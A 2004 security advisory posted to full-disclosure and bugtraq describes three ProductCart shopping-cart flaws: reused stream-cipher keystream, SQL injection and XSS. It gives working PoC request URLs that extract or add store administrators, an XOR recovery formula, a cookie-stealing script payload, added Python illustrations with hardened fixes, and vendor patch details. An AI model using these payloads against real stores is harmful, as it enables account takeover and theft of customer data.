Message-ID: <4035F834.8010904@s-quadra.com>
Date: Fri, 20 Feb 2004 15:06:12 +0300
From: Nick Gudov <cipher@...uadra.com>
To: full-disclosure <full-disclosure@...ts.netsys.com>,
   bugtraq <bugtraq@...urityfocus.com>
Subject: EarlyImpact ProductCart shopping cart software multiple security
 vulnerabilities


 We are republishing our advisory of 02/18/2004 with an apology to
EarlyImpact software developers for missing their FIX information in
our first publication. We would like to pay tribute to EarlyImpact for
their swift reaction in resolving the problems.

Below is the full version of the advisory of 02/18/2004:


    S-Quadra Advisory #2004-02-16
    
Topic: EarlyImpact ProductCart shopping cart software multiple security 
vulnerabilities
Severity: High
Vendor URL: http://www.earlyimpact.com
Advisory URL: http://www.s-quadra.com/advisories/Adv-20040216.txt
Release date: 16 Feb 2004
    
 1. DESCRIPTION
    
 ProductCart is a shopping cart application for e-commerce enabled
sites. It is written in ASP, works on most Windows platforms and uses MS
Access or MS SQL Server as a backend. Please visit
http://www.earlyimpact.com
for information about the ProductCart shopping cart.
     
 2. DETAILS
     
 -- Vulnerability 1: Incorrect use of cryptography
     
 ProductCart software uses a stream cipher algorithm (possibly RC4) to
encrypt various passwords before storing them in a database. A stream
cipher generates a keystream (a sequence of bits used as a key).
Encryption is accomplished by combining the keystream with the plaintext
using the bitwise XOR operation. The generation of the keystream is
independent of the plaintext and ciphertext. In ProductCart a single
cryptographic key is used to encrypt all customer and store administrator
passwords, so every stored password is XORed with the same keystream.
This makes it possible for an attacker to perform a chosen plaintext
attack and obtain the first 100 bytes of keystream (the maximum length
of a customer password). Using these bytes an attacker can decrypt any
encrypted information in the database, including the store administrator
password.
      
 -- Vulnerability 2: SQL Injection vulnerability
      
 An SQL injection vulnerability has been found in the 'advSearch_h.asp'
script.

 Improper use of user-supplied input filters allows an attacker to
modify the SQL query and perform some kinds of SQL injection attacks.

 Successful exploitation of this vulnerability could allow an attacker
to gain administrative access to the ProductCart store and read any
information from the store database (e.g. customers' private data). An
attacker could also execute arbitrary commands using the xp_cmdshell
extended stored procedure.
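 The request in the PoC below splits SQL keywords with "--" ("u--pdate",
"s--elect"). The following added example (not ProductCart code, and not
from the original advisory) models the assumption that the script's
filter strips "--" comment markers from the input and then concatenates
the result into the query, so that the stripped value reassembles into a
keyword; it then shows the hardened pattern of validating the type of
'priceUntil' and binding it as a parameter. SQLite stands in for MS SQL
Server here.

```python
import sqlite3

# Constructed sample value for the 'priceUntil' parameter: the SQL keyword is
# split with "--" so that a comment-stripping filter reassembles it.
PRICE_UNTIL_PAYLOAD = "999;u--pdate customers set phone='0' where zip=987654"


def strip_comment_markers(value):
    """Hypothetical blacklist filter (assumption): removes '--' and nothing else."""
    return value.replace("--", "")


def build_query_unsafely(price_until):
    """Vulnerable pattern: the filtered input is still concatenated into the SQL text.

    Returns the query string so the reader can see the keyword reappear."""
    return ("select sku, price from products where price <= "
            + strip_comment_markers(price_until))


def search_by_max_price(conn, price_until):
    """Hardened pattern: validate the type first, then bind the value as a parameter.

    Returns the matching (sku, price) rows; raises ValueError on non-numeric input,
    so a payload like PRICE_UNTIL_PAYLOAD never reaches the database at all."""
    try:
        limit = float(price_until)
    except ValueError:
        raise ValueError("priceUntil must be numeric")
    cur = conn.execute(
        "select sku, price from products where price <= ? order by sku", (limit,))
    return cur.fetchall()


def demo_db():
    """In-memory products table with constructed rows, for a runnable demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table products (sku text, price real)")
    conn.executemany("insert into products values (?, ?)",
                     [("A1", 500.0), ("B2", 1500.0)])
    return conn
```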
 
 -- Vulnerability 3: Cross Site Scripting vulnerability in 'Custva.asp'
     
 By injecting specially crafted JavaScript code into a URL and tricking a
user into visiting it, a remote attacker can steal the user's session ID
and gain access to the user's personal data.
      
 -- PoC code
      
 --Vulnerability 1 and 2:
      
 Platform: MS SQL Server as a backend

 ProductCart software incorrectly uses cryptographic algorithms to protect
the store administrator password. The combination of this error and the SQL
injection vulnerability allows an attacker to gain administrative access
to the store.

 By performing the following scenario an attacker can find the store
administrator username and password.
        
 Scenario:
        
1. An attacker registers a new customer in the store. Let the value of the
'Postal Code' field in the registration form be '987654'; the attacker
must select a long password (it should be longer than the store
administrator password).
        
2. An attacker performs the following request
        
 http://[target]/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;u--pdate%20customers%20set%20name=(s--elect%20top%201%20idadmin%20from%20admins),lastName=(s--elect%20top%01%20adminpassword%20from%20admins),phone=(s--elect%20password%20from%20customers%20where%20zip=987654)%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&IDBrand=0&resultCnt=200&Submit.x=33& 

        
3. An attacker goes to http://[target]/productcart/pc/Custmoda.asp
and reads his personal information. The value of the "FirstName" field
in this form will be the store administrator login name. The store
administrator password is easy to find by this formula:

  adminpass = (Last Name) xor (Phone) xor (customer login password from
scenario step 1)
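 The formula above and the keystream-reuse explanation in Vulnerability 1
are the same fact: two values encrypted under one fixed keystream differ
only by the XOR of their plaintexts. The added example below (not
ProductCart code, and not from the original advisory) models that design
with a constructed keystream, shows why the key cancels out, and contrasts
it with the defender's alternative of storing a salted password hash that
is verified rather than decrypted.

```python
import hashlib
import hmac
import os


def keystream(key, length):
    """Constructed stand-in for the cipher's keystream (a counter-mode PRF over one
    fixed key). The cancellation shown below holds for any stream cipher, RC4 included."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt_with_fixed_key(key, plaintext):
    """Model of the flawed design: every password is XORed with the same keystream."""
    return xor(plaintext, keystream(key, len(plaintext)))


def recover_from_related_ciphertexts(c_admin, c_customer, customer_password):
    """The advisory's formula: (Last Name) xor (Phone) xor (customer password).
    Both ciphertexts share one keystream prefix, so the keystream cancels and the
    shorter plaintext is exposed without the key ever being known."""
    n = min(len(c_admin), len(c_customer), len(customer_password))
    return xor(xor(c_admin[:n], c_customer[:n]), customer_password[:n])


# Defender's alternative: a password only ever needs to be verified, not decrypted,
# so it should be stored as a salted, slow hash. There is then no ciphertext to relate.
def hash_password(password, salt=None, iterations=200_000):
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password, salt, iterations)
    return salt, digest


def verify_password(password, salt, digest, iterations=200_000):
    candidate = hashlib.pbkdf2_hmac("sha256", password, salt, iterations)
    return hmac.compare_digest(candidate, digest)
```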
         
 In the following scenario an attacker can add a new administrator to the store.
         
 Scenario:
         
1. An attacker registers a new customer in the store. Let the value of the
'First Name' field in the registration form be '1*2*3*4*5*6*7*8*9*10*',
the value of the 'Last Name' field be '34567', the value of the
'Password' field be '111' and the value of the 'Postal Code' field be
'987654'.
         
2. An attacker performs the following request:
         
 http://[target]/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;in--sert%20into%20admins%20(idadmin,%20adminpassword,%20adminlevel)%20s--elect%20lastName,%20password,%20name%20from%20customers%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&IDBrand=0&resultCnt=200&Submit.x=33& 

         
         
3. An attacker logs into the store admin interface with username
'34567' and password '111'.
         
 -- Vulnerability 3:
         
 http://[target]/productcart/pc/Custva.asp?redirectUrl="><script>alert(document.cookie)</script><" 

         
 3. FIX INFORMATION
         
 S-Quadra alerted EarlyImpact development team to this issue on 29th
January 2004.
 
 Early Impact official response:

  "Vulnerability 1 cannot be exploited since vulnerability 2 and 3 have
been addressed. Nevertheless, Early Impact is further investigating the
issue and will look at alternative uses of cryptography for future
versions of ProductCart.

 Vulnerability 2 was addressed with the Security Patch released on
01.30.2004, which is available for download at no charge from
http://www.earlyimpact.com/productcart/support/ - This vulnerability
does not apply to ProductCart v2.53 and above. All users of ProductCart
v2.52 and below have been notified of this security issue and of the
availability of the corresponding Security Patch.

 Vulnerability 3 was addressed with the Security Patch released on
01.30.2004, which is available for download at no charge from
http://www.earlyimpact.com/productcart/support/ - This vulnerability
does not apply to ProductCart v2.53 and above. All users of ProductCart
v2.52 and below have been notified of this security issue and of the
availability of the corresponding Security Patch."
          
 4. CREDITS
          
 Nick Gudov <cipher@...uadra.com> is responsible for discovering this issue.
       
 5. ABOUT
       
 S-Quadra offers services in computer security, penetration testing and
network assessment, web application security, source code review and
third party product vulnerability assessment, forensic support and
reverse engineering.
         
    S-Quadra Advisory #2004-02-16
